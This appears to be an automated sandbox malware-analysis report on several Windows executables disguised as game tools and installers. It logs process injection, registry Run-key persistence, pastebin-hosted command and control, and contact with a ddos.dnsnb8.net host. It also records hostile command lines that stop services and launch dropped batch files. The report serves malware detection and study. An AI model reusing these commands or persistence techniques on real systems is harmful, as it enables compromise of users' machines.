N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3664 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
PID 3664 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
PID 3664 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe
PID 3664 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2020 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2020 wrote to memory of 1496 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 3664 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Windows\SysWOW64\cmd.exe
PID 3664 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe C:\Windows\SysWOW64\cmd.exe
PID 5116 wrote to memory of 5028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 5116 wrote to memory of 5028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 5116 wrote to memory of 5028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\sc.exe
PID 2804 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe C:\Windows\SysWOW64\cmd.exe
PID 2804 wrote to memory of 2472 N/A C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Gaming Chair.exe"

C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe

C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc start FairplayKD > NUL 2>&1

C:\Windows\SysWOW64\sc.exe

sc start FairplayKD

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c sc stop %c > NUL 2>&1

C:\Windows\SysWOW64\sc.exe

sc stop %c

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4c6c54cc.bat" "

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 ddos.dnsnb8.net udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 105.84.221.44.in-addr.arpa udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp

Files

memory/3664-0-0x0000000000460000-0x0000000000680000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iakPKCCS.exe

MD5 56b2c3810dba2e939a8bb9fa36d3cf96
SHA1 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA256 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA512 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

memory/2804-4-0x0000000000DB0000-0x0000000000DB9000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\YGRQ0H1Z\k2[1].rar

MD5 d3b07384d113edec49eaa6238ad5ff00
SHA1 f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256 b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA512 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

C:\Users\Admin\AppData\Local\Temp\67DD4EB2.exe

MD5 20879c987e2f9a916e578386d499f629
SHA1 c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA256 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512 bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

C:\Users\Admin\AppData\Local\Temp\4c6c54cc.bat

MD5 97211e05be2806ed784ed7d5a9f673f1
SHA1 22613a40afbbe4e4d85a7a4b6f2faafd309b1542
SHA256 56d84f77e0690b656e83032165eb60dac337b373bec7491dce4b703628b181be
SHA512 e16c22414e2f131fd961203d734af23c0a0e3051d3b121fc76a4cdab18920cfc9ef2a3a93fb683e0f8ceac6ea6200bbc198d8f233cbeef5a0ce7055446c59dde

memory/2804-49-0x0000000000DB0000-0x0000000000DB9000-memory.dmp

memory/3664-51-0x0000000000460000-0x0000000000680000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

148s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe"

Signatures

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Hybris_gamesnusSafe.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 16.173.189.20.in-addr.arpa udp

Files

memory/2108-0-0x00007FF64ED99000-0x00007FF64F102000-memory.dmp

memory/2108-2-0x00007FFEB3C60000-0x00007FFEB3C62000-memory.dmp

memory/2108-1-0x00007FFEB3C50000-0x00007FFEB3C52000-memory.dmp

memory/2108-4-0x00007FF64ED90000-0x00007FF64F63F000-memory.dmp

memory/2108-6-0x00007FF64ED90000-0x00007FF64F63F000-memory.dmp

memory/2108-5-0x00007FF64ED99000-0x00007FF64F102000-memory.dmp

Analysis: behavioral21

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

97s

Max time network

145s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2319007114-3335580451-2147236418-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Program Files\system32\RDR4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\system32\RDR4.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe N/A
File opened for modification C:\Program Files\system32\RDR4.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe N/A
File created C:\Program Files\system32\stTfuo7I.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe N/A
File opened for modification C:\Program Files\system32\stTfuo7I.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe N/A
File opened for modification C:\Program Files\system32 C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe N/A
File created C:\Program Files\system32\__tmp_rar_sfx_access_check_240607703 C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1996 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe C:\Program Files\system32\RDR4.exe
PID 1996 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe C:\Program Files\system32\RDR4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Sobfox.exe"

C:\Program Files\system32\RDR4.exe

"C:\Program Files\system32\RDR4.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

C:\Program Files\system32\RDR4.exe

MD5 de431fe64329b3dde12f288898cba489
SHA1 b8f1f3d0b2cc37cc4aa041046fa9ced2bc92f6ad
SHA256 157d83991428e260d9e07c6d8679d35835d6c8c3d8ac1b5669ec10419f4e0e9f
SHA512 b7127225c5dcd2d027158cbc11eaebaef8f674ec0ff775f6eb11bc43692ad90c52af558590131543de803f0223d66dad69c776034adddaab613299afea26e95a

memory/5116-13-0x00007FF77BD90000-0x00007FF77BDBF000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

93s

Max time network

147s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\dutchlove2.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3012 wrote to memory of 4408 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3012 wrote to memory of 4408 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3012 wrote to memory of 4408 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\dutchlove2.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\tmpfile-main\dutchlove2.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 216.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

7s

Max time network

164s

Command Line

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe"

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe

"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\KOSTYAMANIPULATOR.exe"

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\explorer.exe

explorer.exe /LOADSAVEDWINDOWS

Network

Country Destination Domain Proto
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 201.203.100.95.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/4408-0-0x0000000000461000-0x000000000097E000-memory.dmp

memory/4408-1-0x0000000001760000-0x0000000001761000-memory.dmp

memory/4408-3-0x0000000000400000-0x0000000001330000-memory.dmp

memory/4408-5-0x0000000000400000-0x0000000001330000-memory.dmp

memory/4408-6-0x0000000000400000-0x0000000001330000-memory.dmp

memory/4408-7-0x0000000000461000-0x000000000097E000-memory.dmp

memory/4408-8-0x0000000000400000-0x0000000001330000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-12-02 16:10

Reported

2024-12-02 16:14

Platform

win10ltsc2021-20241023-en

Max time kernel

150s

Max time network

159s

Command Line

winlogon.exe

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 908 created 624 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\system32\winlogon.exe

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\system32\wbem\wmiprvse.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate C:\Windows\system32\wbem\wmiprvse.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation C:\Program Files\Node64.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Node64 = "C:\\Program Files\\Node64.exe" C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node32 = "C:\\Windows\\System32\\$Node32.exe" C:\Program Files\Node64.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node2Json = "C:\\Windows\\System32\\$Node2Json.exe" C:\Program Files\Node64.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$Node3Json = "C:\\Windows\\System32\\$Node3Json.exe" C:\Program Files\Node64.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF C:\Windows\System32\DxDiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\usbport.inf_amd64_230f9025c8623e5d\usbport.PNF C:\Windows\System32\DxDiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF C:\Windows\System32\DxDiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\usbport.inf_amd64_230f9025c8623e5d\usbport.PNF C:\Windows\System32\DxDiag.exe N/A
File created C:\Windows\System32\$Node2Json.exe C:\Program Files\Node64.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\input.inf_amd64_71e43a6eaa912e56\input.PNF C:\Windows\System32\DxDiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF C:\Windows\System32\DxDiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\machine.inf_amd64_72ab89a5cc3218be\machine.PNF C:\Windows\System32\DxDiag.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\$Node32.exe C:\Program Files\Node64.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\msmouse.inf_amd64_1793a485b491b199\msmouse.PNF C:\Windows\System32\DxDiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\keyboard.inf_amd64_5938c699b80ebb8f\keyboard.PNF C:\Windows\System32\DxDiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF C:\Windows\System32\DxDiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\hdaudbus.inf_amd64_e89200d3ede2154e\hdaudbus.PNF C:\Windows\System32\DxDiag.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\input.inf_amd64_71e43a6eaa912e56\input.PNF C:\Windows\System32\DxDiag.exe N/A
File created \??\c:\windows\system32\driverstore\filerepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF C:\Windows\System32\DxDiag.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 C:\Windows\system32\svchost.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hdaudbus.inf_amd64_e89200d3ede2154e\hdaudbus.PNF C:\Windows\System32\DxDiag.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\netrtl64.inf_amd64_8e9c2368fe308df2\netrtl64.PNF C:\Windows\System32\DxDiag.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
File created C:\Windows\System32\$Node32.exe C:\Program Files\Node64.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\System32\$Node2Json.exe C:\Program Files\Node64.exe N/A
File opened for modification C:\Windows\System32\$Node3Json.exe C:\Program Files\Node64.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_amd64_f6ccd5b2c8226c4a\mshdc.PNF C:\Windows\System32\DxDiag.exe N/A
File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work C:\Windows\system32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 C:\Windows\system32\svchost.exe N/A
